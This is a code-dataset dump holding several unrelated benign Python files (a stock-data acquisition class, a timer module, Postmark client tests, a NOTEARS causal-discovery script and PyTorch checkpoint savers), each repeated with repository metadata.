Options are ["intraday"].
file_structure: list of str, optional
How to set up parent/child folders.
Defaults to ["symbol", "frequency", "data"].
Attributes
----------
stocklist: list of str
List of symbols of stocks of interest.
apikey_dict: dict
A dictionary of API keys in {"api":"key"} pairs.
api_list: list of str, optional
List of APIs, in preferred order.
Options are ["Alpha Vantage",]
root_dir: str, optional
The root directory of the database.
frequency: str, optional
"intraday", "daily", "weekly", "monthly"
Options are ["intraday"].
file_structure: list of str, optional
How to set up parent/child folders.
Defaults to ["symbol", "frequency", "data"].
"""
def __init__(self, stocklist, api_config_path, apikey_dict,
api_list=["Alpha Vantage",],frequency="intraday", root_dir="./",
file_structure=["symbol", "frequency", "data"],
rolling=False, api_call_interval=12,
database_update_interval=86400):
"""Constructor
Parameters
----------
stocklist: list of str
List of symbols of stocks of interest.
api_config_path: str
Path to the API configuration file.
apikey_dict: dict
A dictionary of API keys in {"api":"key"} pairs.
api_list: list of str, optional
List of APIs, in preferred order.
Options are ["Alpha Vantage",]
root_dir: str, optional
The root directory of the database.
frequency: str, optional
"intraday", "daily", "weekly", "monthly"
Options are ["intraday"].
file_structure: list of str, optional
How to set up parent/child folders.
Defaults to ["symbol", "frequency", "data"].
rolling: boolean, optional
Rolling update. Rate limited by API requestion limitations
set in the API configuration file.
Defaults to be False.
api_call_interval: int, optional
Minimal delay (seconds) between API calls.
Use your API's limitation to derive this value.
Defaults to 12.
database_update_interval: int, optional
Interval (seconds) between each database update.
Defaults to 86400 (1 day).
"""
self.stocklist = stocklist
self.root_dir = root_dir
self.api_config_path = api_config_path
self.api_list = api_list
self.apikey_dict = apikey_dict
self.frequency = frequency
self.file_structure = file_structure
self.rolling = rolling
self.api_call_interval = datetime.timedelta(seconds=api_call_interval)
self.database_update_interval = datetime.timedelta(
seconds=database_update_interval)
def update_database(self, download_kwargs={}, export_kwargs={}):
"""Get stock data from API and update datebase.
Parameters
----------
downloader_kwargs: dict
Keyword arguments passed to
stockdaq.data.downloader.YourDownloader.download() method.
export_kwargs: dict
Keyword arguments passed to
stockdaq.data.downloader.Downloader.export() method.
"""
# api = self.api_list[0]
# apikey = self.apikey_dict[api]
# downloader = stockdaq.data.downloader_dict.downloader_dict[api](
# apikey=apikey
# )
last_update_datetime = datetime.datetime.now()
for symbol in self.stocklist:
for api in self.api_list:
try:
apikey = self.apikey_dict[api]
downloader = (
stockdaq.data.downloader_dict.downloader_dict[api](
apikey=apikey
)
)
downloader.download(
symbol=symbol, frequency=self.frequency,
**download_kwargs
)
last_api_call_datetime = datetime.datetime.now()
# Now prefix is the dir.
prefix = self.get_prefix(symbol=symbol)
if not os.path.isdir(prefix):
os.makedirs(prefix)
# Now add the customized prefix
try:
export_kwargs["prefix"]
except KeyError:
export_kwargs["prefix"] = None
if export_kwargs["prefix"] is not None:
prefix += export_kwargs["prefix"]
new_export_kwargs = dict(export_kwargs)
new_export_kwargs["prefix"] = prefix
downloader.export(**new_export_kwargs)
while (datetime.datetime.now() - last_api_call_datetime <
self.api_call_interval):
time.sleep(1)
break # Break out of the api loop when success
except ValueError as err:
logger.error("Error encountered when trying to acquisite "
"symbol: {} data from API: {}\nError message:"
"\n{}"
"".format(symbol, api, err))
except:
print("Unexpected error:", sys.exc_info()[0])
raise
logger.info("Database update finished.")
if self.rolling:
next_update_datetime = (last_update_datetime
+ self.database_update_interval)
logger.info("Rolling update enabled, "
"next update is scheduled at "
"{}.".format(str(next_update_datetime)))
while datetime.datetime.now() < next_update_datetime:
time.sleep(1)
self.update_database(
download_kwargs=download_kwargs, export_kwargs=export_kwargs
)
def get_prefix(self, symbol):
"""Get path prefix for a specific data.
Parameters
----------
symbol: str
The stock symbol.
Returns
-------
prefix: str
The prefix of the file path.
"""
prefix = self.root_dir+""
for folder in self.file_structure:
if folder == "data":
break
elif folder == "frequency":
prefix += self.frequency+"/"
elif folder == "symbol":
prefix += symbol+"/"
else:
raise ValueError("{} structure not available.".format(folder))
return prefix
| 36.823529 | 79 | 0.545793 | """Data acquisition system.
"""
import datetime
import os
import sys
import time
import stockdaq.data.downloader_dict
from stockdaq.logger import logger
class Acquisiter:
"""Data Acquisiter
Parameters
----------
stocklist: list of str
List of symbols of stocks of interest.
apikey_dict: dict
A dictionary of API keys in {"api":"key"} pairs.
api_list: list of str, optional
List of APIs, in preferred order.
Options are ["Alpha Vantage",]
root_dir: str, optional
The root directory of the database.
frequency: str, optional
"intraday", "daily", "weekly", "monthly"
Options are ["intraday"].
file_structure: list of str, optional
How to set up parent/child folders.
Defaults to ["symbol", "frequency", "data"].
Attributes
----------
stocklist: list of str
List of symbols of stocks of interest.
apikey_dict: dict
A dictionary of API keys in {"api":"key"} pairs.
api_list: list of str, optional
List of APIs, in preferred order.
Options are ["Alpha Vantage",]
root_dir: str, optional
The root directory of the database.
frequency: str, optional
"intraday", "daily", "weekly", "monthly"
Options are ["intraday"].
file_structure: list of str, optional
How to set up parent/child folders.
Defaults to ["symbol", "frequency", "data"].
"""
def __init__(self, stocklist, api_config_path, apikey_dict,
api_list=["Alpha Vantage",],frequency="intraday", root_dir="./",
file_structure=["symbol", "frequency", "data"],
rolling=False, api_call_interval=12,
database_update_interval=86400):
"""Constructor
Parameters
----------
stocklist: list of str
List of symbols of stocks of interest.
api_config_path: str
Path to the API configuration file.
apikey_dict: dict
A dictionary of API keys in {"api":"key"} pairs.
api_list: list of str, optional
List of APIs, in preferred order.
Options are ["Alpha Vantage",]
root_dir: str, optional
The root directory of the database.
frequency: str, optional
"intraday", "daily", "weekly", "monthly"
Options are ["intraday"].
file_structure: list of str, optional
How to set up parent/child folders.
Defaults to ["symbol", "frequency", "data"].
rolling: boolean, optional
Rolling update. Rate limited by API requestion limitations
set in the API configuration file.
Defaults to be False.
api_call_interval: int, optional
Minimal delay (seconds) between API calls.
Use your API's limitation to derive this value.
Defaults to 12.
database_update_interval: int, optional
Interval (seconds) between each database update.
Defaults to 86400 (1 day).
"""
self.stocklist = stocklist
self.root_dir = root_dir
self.api_config_path = api_config_path
self.api_list = api_list
self.apikey_dict = apikey_dict
self.frequency = frequency
self.file_structure = file_structure
self.rolling = rolling
self.api_call_interval = datetime.timedelta(seconds=api_call_interval)
self.database_update_interval = datetime.timedelta(
seconds=database_update_interval)
def update_database(self, download_kwargs={}, export_kwargs={}):
"""Get stock data from API and update datebase.
Parameters
----------
downloader_kwargs: dict
Keyword arguments passed to
stockdaq.data.downloader.YourDownloader.download() method.
export_kwargs: dict
Keyword arguments passed to
stockdaq.data.downloader.Downloader.export() method.
"""
# api = self.api_list[0]
# apikey = self.apikey_dict[api]
# downloader = stockdaq.data.downloader_dict.downloader_dict[api](
# apikey=apikey
# )
last_update_datetime = datetime.datetime.now()
for symbol in self.stocklist:
for api in self.api_list:
try:
apikey = self.apikey_dict[api]
downloader = (
stockdaq.data.downloader_dict.downloader_dict[api](
apikey=apikey
)
)
downloader.download(
symbol=symbol, frequency=self.frequency,
**download_kwargs
)
last_api_call_datetime = datetime.datetime.now()
# Now prefix is the dir.
prefix = self.get_prefix(symbol=symbol)
if not os.path.isdir(prefix):
os.makedirs(prefix)
# Now add the customized prefix
try:
export_kwargs["prefix"]
except KeyError:
export_kwargs["prefix"] = None
if export_kwargs["prefix"] is not None:
prefix += export_kwargs["prefix"]
new_export_kwargs = dict(export_kwargs)
new_export_kwargs["prefix"] = prefix
downloader.export(**new_export_kwargs)
while (datetime.datetime.now() - last_api_call_datetime <
self.api_call_interval):
time.sleep(1)
break # Break out of the api loop when success
except ValueError as err:
logger.error("Error encountered when trying to acquisite "
"symbol: {} data from API: {}\nError message:"
"\n{}"
"".format(symbol, api, err))
except:
print("Unexpected error:", sys.exc_info()[0])
raise
logger.info("Database update finished.")
if self.rolling:
next_update_datetime = (last_update_datetime
+ self.database_update_interval)
logger.info("Rolling update enabled, "
"next update is scheduled at "
"{}.".format(str(next_update_datetime)))
while datetime.datetime.now() < next_update_datetime:
time.sleep(1)
self.update_database(
download_kwargs=download_kwargs, export_kwargs=export_kwargs
)
def get_prefix(self, symbol):
"""Get path prefix for a specific data.
Parameters
----------
symbol: str
The stock symbol.
Returns
-------
prefix: str
The prefix of the file path.
"""
prefix = self.root_dir+""
for folder in self.file_structure:
if folder == "data":
break
elif folder == "frequency":
prefix += self.frequency+"/"
elif folder == "symbol":
prefix += symbol+"/"
else:
raise ValueError("{} structure not available.".format(folder))
return prefix
| 0 | 0 | 0 |
0bf59a8f57abd08c08979c8994ad2b936ec6305d | 6,777 | py | Python | src/hio/help/timing.py | pfeairheller/hio | 44669adb62c81357491f9f6157312bc1313b56cf | [
"Apache-2.0"
] | 2 | 2020-12-09T17:26:25.000Z | 2021-05-07T02:21:57.000Z | src/hio/help/timing.py | pfeairheller/hio | 44669adb62c81357491f9f6157312bc1313b56cf | [
"Apache-2.0"
] | 4 | 2021-03-30T20:50:19.000Z | 2022-01-06T17:16:18.000Z | src/hio/help/timing.py | pfeairheller/hio | 44669adb62c81357491f9f6157312bc1313b56cf | [
"Apache-2.0"
] | 3 | 2021-04-08T19:35:36.000Z | 2021-06-03T13:39:05.000Z | # -*- encoding: utf-8 -*-
"""
hio.help.timing module
"""
import time
from .. import hioing
class TimerError(hioing.HioError):
"""
Generic Timer Errors
Usage:
raise TimerError("error message")
"""
class RetroTimerError(TimerError):
"""
Error due to real time being retrograded before start time of timer
Usage:
raise RetroTimerError("error message")
"""
class Timer(hioing.Mixin):
"""
Class to manage real elaspsed time using time module.
Attributes:
._start is start tyme in seconds
._stop is stop tyme in seconds
Properties:
.duration is float time duration in seconds of timer from ._start to ._stop
.elaspsed is float time elasped in seconds since ._start
.remaining is float time remaining in seconds until ._stop
.expired is boolean, True if expired, False otherwise, i.e. time >= ._stop
methods:
.start() start timer at current time
.restart() = restart timer at last ._stop so no time lost
"""
def __init__(self, duration=0.0, start=None, **kwa):
"""
Initialization method for instance.
Parameters:
duration is float duration of timer in seconds (fractional)
start is float optional start time in seconds allows starting before
or after current time
"""
super(Timer, self).__init__(**kwa) # Mixin for Mult-inheritance MRO
self._start = float(start) if start is not None else time.time()
self._stop = self._start + float(duration) # need for default duration
self.start(duration=duration, start=start)
@property
def duration(self):
"""
duration property getter, .duration = ._stop - ._start
.duration is float duration tyme
"""
return (self._stop - self._start)
@property
def elapsed(self):
"""
elapsed time property getter,
Returns elapsed time in seconds (fractional) since ._start.
"""
return (time.time() - self._start)
@property
def remaining(self):
"""
remaining time property getter,
Returns remaining time in seconds (fractional) before ._stop.
"""
return (self._stop - time.time())
@property
def expired(self):
"""
Returns True if timer has expired, False otherwise.
time.time() >= ._stop,
"""
return (time.time() >= self._stop)
def start(self, duration=None, start=None):
"""
Starts Timer of duration secs at start time start secs.
If duration not provided then uses current duration
If start not provided then starts at current time.time()
"""
# remember current duration when duration not provided
duration = float(duration) if duration is not None else self.duration
self._start = float(start) if start is not None else time.time()
self._stop = self._start + duration
return self._start
def restart(self, duration=None):
"""
Lossless restart of Timer at start = ._stop for duration if provided,
Otherwise current duration.
No time lost. Useful to extend Timer so no time lost
"""
return self.start(duration=duration, start=self._stop)
class MonoTimer(Timer):
"""
Class to manage real elaspsed time using time module but with monotonically
increating time guarantee in spite of system time being retrograded.
If the system clock is retrograded (moved back in time) while the timer is
running then time.time() could move to before the start time.
MonoTimer detects this retrograde and if retro is True then
retrogrades the start and stop times back Otherwise it raises a TimerRetroError.
MonoTimer is not able to detect a prograded clock (moved forward in time)
Attributes:
._start is start time in seconds
._stop is stop time in seconds
._last is last measured time in seconds with retrograde handling
.retro is boolean If True retrograde ._start and ._stop when time is retrograded.
Properties:
.duration is float time duration in seconds of timer from ._start to ._stop
.elaspsed is float time elasped in seconds since ._start
.remaining is float time remaining in seconds until ._stop
.expired is boolean True if expired, False otherwise, i.e. time >= ._stop
.latest is float latest measured time in seconds with retrograte handling
methods:
.start() = start timer at current time returns start time
.restart() = restart timer at last ._stop so no time lost, returns start time
"""
def __init__(self, duration=0.0, start=None, retro=True):
"""
Initialization method for instance.
Parameters:
duration in seconds (fractional)
start is float optional start time in seconds allows starting before
or after current time
retro is boolean IF True automaticall shift timer whenever
retrograded clock detected Otherwise ignore
"""
self._start = float(start) if start is not None else time.time()
self._stop = self._start + float(duration) # need for default duration
self._last = self._start
self.retro = True if retro else False # ensure boolean
self.start(duration=duration, start=start)
@property
def elapsed(self):
"""
elapsed time property getter,
Returns elapsed time in seconds (fractional) since ._start.
"""
return (self.latest - self._start)
@property
def remaining(self):
"""
remaining time property getter,
Returns remaining time in seconds (fractional) before ._stop.
"""
return (self._stop - self.latest)
@property
def expired(self):
"""
Returns True if timer has expired, False otherwise.
.latest >= ._stop,
"""
return (self.latest >= self._stop)
@property
def latest(self):
"""
latest measured time property getter,
Returns latest measured time in seconds adjusted for retrograded system time.
"""
delta = time.time() - self._last # current time - last time checked
if delta < 0: # system clock has retrograded
if self.retro:
self._start += delta
self._stop += delta
else:
raise RetroTimerError("System time retrograded by {0} seconds"
" while timer running.".format(delta))
self._last += delta
return self._last
| 32.581731 | 89 | 0.626531 | # -*- encoding: utf-8 -*-
"""
hio.help.timing module
"""
import time
from .. import hioing
class TimerError(hioing.HioError):
"""
Generic Timer Errors
Usage:
raise TimerError("error message")
"""
class RetroTimerError(TimerError):
"""
Error due to real time being retrograded before start time of timer
Usage:
raise RetroTimerError("error message")
"""
class Timer(hioing.Mixin):
"""
Class to manage real elaspsed time using time module.
Attributes:
._start is start tyme in seconds
._stop is stop tyme in seconds
Properties:
.duration is float time duration in seconds of timer from ._start to ._stop
.elaspsed is float time elasped in seconds since ._start
.remaining is float time remaining in seconds until ._stop
.expired is boolean, True if expired, False otherwise, i.e. time >= ._stop
methods:
.start() start timer at current time
.restart() = restart timer at last ._stop so no time lost
"""
def __init__(self, duration=0.0, start=None, **kwa):
"""
Initialization method for instance.
Parameters:
duration is float duration of timer in seconds (fractional)
start is float optional start time in seconds allows starting before
or after current time
"""
super(Timer, self).__init__(**kwa) # Mixin for Mult-inheritance MRO
self._start = float(start) if start is not None else time.time()
self._stop = self._start + float(duration) # need for default duration
self.start(duration=duration, start=start)
@property
def duration(self):
"""
duration property getter, .duration = ._stop - ._start
.duration is float duration tyme
"""
return (self._stop - self._start)
@property
def elapsed(self):
"""
elapsed time property getter,
Returns elapsed time in seconds (fractional) since ._start.
"""
return (time.time() - self._start)
@property
def remaining(self):
"""
remaining time property getter,
Returns remaining time in seconds (fractional) before ._stop.
"""
return (self._stop - time.time())
@property
def expired(self):
"""
Returns True if timer has expired, False otherwise.
time.time() >= ._stop,
"""
return (time.time() >= self._stop)
def start(self, duration=None, start=None):
"""
Starts Timer of duration secs at start time start secs.
If duration not provided then uses current duration
If start not provided then starts at current time.time()
"""
# remember current duration when duration not provided
duration = float(duration) if duration is not None else self.duration
self._start = float(start) if start is not None else time.time()
self._stop = self._start + duration
return self._start
def restart(self, duration=None):
"""
Lossless restart of Timer at start = ._stop for duration if provided,
Otherwise current duration.
No time lost. Useful to extend Timer so no time lost
"""
return self.start(duration=duration, start=self._stop)
class MonoTimer(Timer):
"""
Class to manage real elaspsed time using time module but with monotonically
increating time guarantee in spite of system time being retrograded.
If the system clock is retrograded (moved back in time) while the timer is
running then time.time() could move to before the start time.
MonoTimer detects this retrograde and if retro is True then
retrogrades the start and stop times back Otherwise it raises a TimerRetroError.
MonoTimer is not able to detect a prograded clock (moved forward in time)
Attributes:
._start is start time in seconds
._stop is stop time in seconds
._last is last measured time in seconds with retrograde handling
.retro is boolean If True retrograde ._start and ._stop when time is retrograded.
Properties:
.duration is float time duration in seconds of timer from ._start to ._stop
.elaspsed is float time elasped in seconds since ._start
.remaining is float time remaining in seconds until ._stop
.expired is boolean True if expired, False otherwise, i.e. time >= ._stop
.latest is float latest measured time in seconds with retrograte handling
methods:
.start() = start timer at current time returns start time
.restart() = restart timer at last ._stop so no time lost, returns start time
"""
def __init__(self, duration=0.0, start=None, retro=True):
"""
Initialization method for instance.
Parameters:
duration in seconds (fractional)
start is float optional start time in seconds allows starting before
or after current time
retro is boolean IF True automaticall shift timer whenever
retrograded clock detected Otherwise ignore
"""
self._start = float(start) if start is not None else time.time()
self._stop = self._start + float(duration) # need for default duration
self._last = self._start
self.retro = True if retro else False # ensure boolean
self.start(duration=duration, start=start)
@property
def elapsed(self):
"""
elapsed time property getter,
Returns elapsed time in seconds (fractional) since ._start.
"""
return (self.latest - self._start)
@property
def remaining(self):
"""
remaining time property getter,
Returns remaining time in seconds (fractional) before ._stop.
"""
return (self._stop - self.latest)
@property
def expired(self):
"""
Returns True if timer has expired, False otherwise.
.latest >= ._stop,
"""
return (self.latest >= self._stop)
@property
def latest(self):
"""
latest measured time property getter,
Returns latest measured time in seconds adjusted for retrograded system time.
"""
delta = time.time() - self._last # current time - last time checked
if delta < 0: # system clock has retrograded
if self.retro:
self._start += delta
self._stop += delta
else:
raise RetroTimerError("System time retrograded by {0} seconds"
" while timer running.".format(delta))
self._last += delta
return self._last
| 0 | 0 | 0 |
f8d8a660a477cb907594f894ae2d27bc145020dd | 2,428 | py | Python | tests/test_core.py | bkolodziej/postmarker | ff41941213731e7ae27639452cca6e622c560b51 | [
"MIT"
] | null | null | null | tests/test_core.py | bkolodziej/postmarker | ff41941213731e7ae27639452cca6e622c560b51 | [
"MIT"
] | null | null | null | tests/test_core.py | bkolodziej/postmarker | ff41941213731e7ae27639452cca6e622c560b51 | [
"MIT"
] | null | null | null | # coding: utf-8
import pytest
from requests import HTTPError, Response
from postmarker.core import USER_AGENT, PostmarkClient
from postmarker.models.messages import MessageManager, OutboundMessageManager
from postmarker.models.triggers import TriggersManager
@pytest.mark.parametrize("klass", (PostmarkClient, OutboundMessageManager, MessageManager, TriggersManager))
| 39.16129 | 118 | 0.687809 | # coding: utf-8
import pytest
from requests import HTTPError, Response
from postmarker.core import USER_AGENT, PostmarkClient
from postmarker.models.messages import MessageManager, OutboundMessageManager
from postmarker.models.triggers import TriggersManager
class TestClient:
def test_server_client(self, postmark, server_token, postmark_request):
postmark.call("GET", "endpoint")
postmark_request.assert_called_with(
"GET",
"https://api.postmarkapp.com/endpoint",
headers={"X-Postmark-Server-Token": server_token, "Accept": "application/json", "User-Agent": USER_AGENT},
params={},
json=None,
timeout=None,
)
def test_no_token(self):
with pytest.raises(AssertionError) as exc:
PostmarkClient(None)
assert str(exc.value).startswith("You have to provide token to use Postmark API")
def test_repr(self, postmark, server_token):
assert repr(postmark) == "<PostmarkClient: %s>" % server_token
@pytest.mark.parametrize(
"config, kwargs",
(
({"POSTMARK_SERVER_TOKEN": "foo", "POSTMARK_TIMEOUT": 1}, {"is_uppercase": True}),
({"postmark_server_token": "foo", "postmark_timeout": 1}, {"is_uppercase": False}),
),
)
def test_from_config(self, config, kwargs):
instance = PostmarkClient.from_config(config, **kwargs)
assert instance.server_token == "foo"
assert instance.timeout == 1
assert instance.account_token is None
@pytest.mark.parametrize("klass", (PostmarkClient, OutboundMessageManager, MessageManager, TriggersManager))
class TestManagersSetup:
def test_duplicate_names(self, klass):
managers_names = [manager.name for manager in klass._managers]
assert len(managers_names) == len(set(managers_names)), "Defined managers names are not unique"
def test_names_overriding(self, klass):
assert not any(
manager.name in dir(klass) for manager in klass._managers
), "Defined managers names override client's members"
def test_malformed_request(postmark, postmark_request):
postmark_request.return_value = Response()
postmark_request.return_value.status_code = 500
postmark_request.return_value._content = b"Server Error"
with pytest.raises(HTTPError, matches="Server Error"):
postmark.call("GET", "endpoint")
| 1,554 | 380 | 121 |
b772ff19286a45abc84c84815346c862a4cd284d | 3,257 | py | Python | python/uptune/plugins/causaldiscovery.py | Hecmay/uptune | 20a1462c772041b8d1b99f326b372284896faaba | [
"BSD-3-Clause"
] | 29 | 2020-06-19T18:07:38.000Z | 2022-01-03T23:06:53.000Z | python/uptune/plugins/causaldiscovery.py | Hecmay/uptune | 20a1462c772041b8d1b99f326b372284896faaba | [
"BSD-3-Clause"
] | 4 | 2020-07-14T16:20:23.000Z | 2021-05-15T13:56:24.000Z | python/uptune/plugins/causaldiscovery.py | Hecmay/uptune | 20a1462c772041b8d1b99f326b372284896faaba | [
"BSD-3-Clause"
] | 2 | 2020-06-20T00:43:23.000Z | 2020-12-26T00:38:31.000Z | """Implementation of the simple 50-line version of NOTEARS algorithm.
Defines the h function, the augmented Lagrangian, and its gradient.
Each augmented Lagrangian subproblem is minimized by L-BFGS-B from scipy.
Note: this version implements NOTEARS without l1 regularization,
i.e. lambda = 0, hence it requires n >> d.
"""
import numpy as np
import scipy.linalg as slin
import scipy.optimize as sopt
def notears(X: np.ndarray,
max_iter: int = 100,
h_tol: float = 1e-8,
w_threshold: float = 1e-1) -> np.ndarray:
"""Solve min_W ell(W; X) s.t. h(W) = 0 using augmented Lagrangian.
Args:
X: [n,d] sample matrix
max_iter: max number of dual ascent steps
h_tol: exit if |h(w)| <= h_tol
w_threshold: fixed threshold for edge weights
Returns:
W_est: [d,d] estimate
"""
n, d = X.shape
# X = X + np.random.normal(scale=1.0, size=(n, d))
w_est, w_new = np.zeros(d * d), np.zeros(d * d)
rho, alpha, h, h_new = 1.0, 0.0, np.inf, np.inf
mask = lambda x, y: True if x < 4 or y < 4 or x == y else False
bnds = [(0, 0) if mask(i, j) else (None, None) for i in range(d) for j in range(d)]
for _ in range(max_iter):
while rho < 1e+20:
sol = sopt.minimize(_func, w_est, method='L-BFGS-B', jac=_grad, bounds=bnds)
w_new = sol.x
h_new = _h(w_new)
if h_new > 0.25 * h:
rho *= 10
else:
break
w_est, h = w_new, h_new
alpha += rho * h
if h <= h_tol:
break
print(w_est.reshape([d, d]))
w_est[np.abs(w_est) < w_threshold] = 0
return w_est.reshape([d, d])
if __name__ == '__main__':
import glog as log
import networkx as nx
import utils
# configurations
n, d = 1000, 10
graph_type, degree, sem_type = 'erdos-renyi', 4, 'linear-gauss'
log.info('Graph: %d node, avg degree %d, %s graph', d, degree, graph_type)
log.info('Data: %d samples, %s SEM', n, sem_type)
# graph
log.info('Simulating graph ...')
G = utils.simulate_random_dag(d, degree, graph_type)
log.info('Simulating graph ... Done')
# data
log.info('Simulating data ...')
X = utils.simulate_sem(G, n, sem_type)
log.info('Simulating data ... Done')
# solve optimization problem
log.info('Solving equality constrained problem ...')
W_est = notears(X)
G_est = nx.DiGraph(W_est)
log.info('Solving equality constrained problem ... Done')
# evaluate
fdr, tpr, fpr, shd, nnz = utils.count_accuracy(G, G_est)
log.info('Accuracy: fdr %f, tpr %f, fpr %f, shd %d, nnz %d',
fdr, tpr, fpr, shd, nnz)
| 32.247525 | 88 | 0.569543 | """Implementation of the simple 50-line version of NOTEARS algorithm.
Defines the h function, the augmented Lagrangian, and its gradient.
Each augmented Lagrangian subproblem is minimized by L-BFGS-B from scipy.
Note: this version implements NOTEARS without l1 regularization,
i.e. lambda = 0, hence it requires n >> d.
"""
import numpy as np
import scipy.linalg as slin
import scipy.optimize as sopt
def notears(X: np.ndarray,
max_iter: int = 100,
h_tol: float = 1e-8,
w_threshold: float = 1e-1) -> np.ndarray:
"""Solve min_W ell(W; X) s.t. h(W) = 0 using augmented Lagrangian.
Args:
X: [n,d] sample matrix
max_iter: max number of dual ascent steps
h_tol: exit if |h(w)| <= h_tol
w_threshold: fixed threshold for edge weights
Returns:
W_est: [d,d] estimate
"""
def _h(w):
W = w.reshape([d, d])
return np.trace(slin.expm(W * W)) - d
def _func(w):
W = w.reshape([d, d])
loss = 0.5 / n * np.square(np.linalg.norm(X.dot(np.eye(d, d) - W), 'fro'))
h = _h(W)
return loss + 0.5 * rho * h * h + alpha * h
def _grad(w):
W = w.reshape([d, d])
loss_grad = - 1.0 / n * X.T.dot(X).dot(np.eye(d, d) - W)
E = slin.expm(W * W)
obj_grad = loss_grad + (rho * (np.trace(E) - d) + alpha) * E.T * W * 2
return obj_grad.flatten()
n, d = X.shape
# X = X + np.random.normal(scale=1.0, size=(n, d))
w_est, w_new = np.zeros(d * d), np.zeros(d * d)
rho, alpha, h, h_new = 1.0, 0.0, np.inf, np.inf
mask = lambda x, y: True if x < 4 or y < 4 or x == y else False
bnds = [(0, 0) if mask(i, j) else (None, None) for i in range(d) for j in range(d)]
for _ in range(max_iter):
while rho < 1e+20:
sol = sopt.minimize(_func, w_est, method='L-BFGS-B', jac=_grad, bounds=bnds)
w_new = sol.x
h_new = _h(w_new)
if h_new > 0.25 * h:
rho *= 10
else:
break
w_est, h = w_new, h_new
alpha += rho * h
if h <= h_tol:
break
print(w_est.reshape([d, d]))
w_est[np.abs(w_est) < w_threshold] = 0
return w_est.reshape([d, d])
if __name__ == '__main__':
import glog as log
import networkx as nx
import utils
# configurations
n, d = 1000, 10
graph_type, degree, sem_type = 'erdos-renyi', 4, 'linear-gauss'
log.info('Graph: %d node, avg degree %d, %s graph', d, degree, graph_type)
log.info('Data: %d samples, %s SEM', n, sem_type)
# graph
log.info('Simulating graph ...')
G = utils.simulate_random_dag(d, degree, graph_type)
log.info('Simulating graph ... Done')
# data
log.info('Simulating data ...')
X = utils.simulate_sem(G, n, sem_type)
log.info('Simulating data ... Done')
# solve optimization problem
log.info('Solving equality constrained problem ...')
W_est = notears(X)
G_est = nx.DiGraph(W_est)
log.info('Solving equality constrained problem ... Done')
# evaluate
fdr, tpr, fpr, shd, nnz = utils.count_accuracy(G, G_est)
log.info('Accuracy: fdr %f, tpr %f, fpr %f, shd %d, nnz %d',
fdr, tpr, fpr, shd, nnz)
| 469 | 0 | 80 |
1764ce25516ed0b6ecde01f531e8de98d0ffbaf2 | 3,915 | py | Python | laia/common/saver.py | basbeu/PyLaia | d14458484b56622204b1730a7d53220c5d0f1bc1 | [
"MIT"
] | 2 | 2020-09-10T13:31:17.000Z | 2021-07-31T09:44:17.000Z | laia/common/saver.py | basbeu/PyLaia | d14458484b56622204b1730a7d53220c5d0f1bc1 | [
"MIT"
] | 1 | 2020-12-06T18:11:52.000Z | 2020-12-06T18:19:38.000Z | laia/common/saver.py | basbeu/PyLaia | d14458484b56622204b1730a7d53220c5d0f1bc1 | [
"MIT"
] | 2 | 2020-04-20T13:40:56.000Z | 2020-10-17T11:59:55.000Z | from __future__ import absolute_import
import inspect
import os
from collections import deque
from typing import Any, Optional, Callable
import torch
from laia.common.logging import get_logger
from laia.common.random import get_rng_state
_logger = get_logger(__name__)
class RollingSaver(Saver):
"""Saver wrapper that keeps a maximum number of files"""
| 29.43609 | 77 | 0.597957 | from __future__ import absolute_import
import inspect
import os
from collections import deque
from typing import Any, Optional, Callable
import torch
from laia.common.logging import get_logger
from laia.common.random import get_rng_state
_logger = get_logger(__name__)
class Saver(object):
def __call__(self, *args, **kwargs):
return self.save(*args, **kwargs)
def save(self, *args, **kwargs):
raise NotImplementedError
class BasicSaver(Saver):
def save(self, obj, filepath):
# type: (Any, str) -> str
dirname = os.path.dirname(os.path.normpath(filepath))
if dirname and not os.path.exists(dirname):
os.makedirs(dirname)
torch.save(obj, filepath)
return filepath
class ObjectSaver(Saver):
def __init__(self, filepath):
# type: (str) -> None
self._filepath = filepath
self._basic_saver = BasicSaver()
def save(self, func_or_class, *args, **kwargs):
# type: (Callable, *Any, **Any) -> str
return self._basic_saver.save(
{
"module": inspect.getmodule(func_or_class).__name__,
"name": func_or_class.__name__,
"args": args,
"kwargs": kwargs,
},
self._filepath,
)
class ModelSaver(ObjectSaver):
def __init__(self, save_path, filename="model"):
# type: (str, str) -> None
super(ModelSaver, self).__init__(os.path.join(save_path, filename))
def save(self, func, *args, **kwargs):
# type: (Callable, *Any, **Any) -> str
path = super(ModelSaver, self).save(func, *args, **kwargs)
_logger.debug("Saved model {}", path)
return path
class CheckpointSaver(Saver):
def __init__(self, filepath):
# type: (str) -> None
self._filepath = filepath
self._basic_saver = BasicSaver()
def get_ckpt(self, suffix):
# type: (str) -> str
return (
"{}-{}".format(self._filepath, suffix)
if suffix is not None
else self._filepath
)
def save(self, state, suffix=None):
# type: (Any, Optional[str]) -> str
path = self._basic_saver.save(state, self.get_ckpt(suffix))
_logger.debug("Saved checkpoint {}", path)
return path
class ModelCheckpointSaver(Saver):
def __init__(self, ckpt_saver, model):
# type: (CheckpointSaver, torch.nn.Module) -> None
self._ckpt_saver = ckpt_saver
self._model = model
def save(self, suffix=None):
return self._ckpt_saver.save(self._model.state_dict(), suffix=suffix)
class StateCheckpointSaver(Saver):
def __init__(self, ckpt_saver, obj, device=None):
# type: (CheckpointSaver, Any, Optional[torch.Device]) -> None
self._ckpt_saver = ckpt_saver
self._obj = obj
self._device = device
def save(self, suffix=None):
# type: (Optional[str]) -> str
state = self._obj.state_dict()
state["rng"] = get_rng_state(device=self._device)
return self._ckpt_saver.save(state, suffix=suffix)
class RollingSaver(Saver):
"""Saver wrapper that keeps a maximum number of files"""
def __init__(self, saver, keep=5):
# type: (Saver, int) -> None
assert keep > 0
self._saver = saver
self._keep = keep
self._last_saved = deque()
def save(self, *args, **kwargs):
# type: (*Any, **Any) -> str
path = self._saver.save(*args, **kwargs)
if len(self._last_saved) >= self._keep:
last = self._last_saved.popleft()
try:
os.remove(last)
_logger.debug("{} checkpoint removed", last)
except OSError:
# Someone else removed the checkpoint, not a big deal
pass
self._last_saved.append(path)
return path
| 2,910 | 49 | 586 |
05aef0a5ed1d687ca3c231945b2ae82f59819513 | 1,098 | py | Python | stubs/m5stack_flowui-v1_4_0-beta/flowlib/modules/_lego.py | mattytrentini/micropython-stubs | 4d596273823b69e9e5bcf5fa67f249c374ee0bbc | [
"MIT"
] | null | null | null | stubs/m5stack_flowui-v1_4_0-beta/flowlib/modules/_lego.py | mattytrentini/micropython-stubs | 4d596273823b69e9e5bcf5fa67f249c374ee0bbc | [
"MIT"
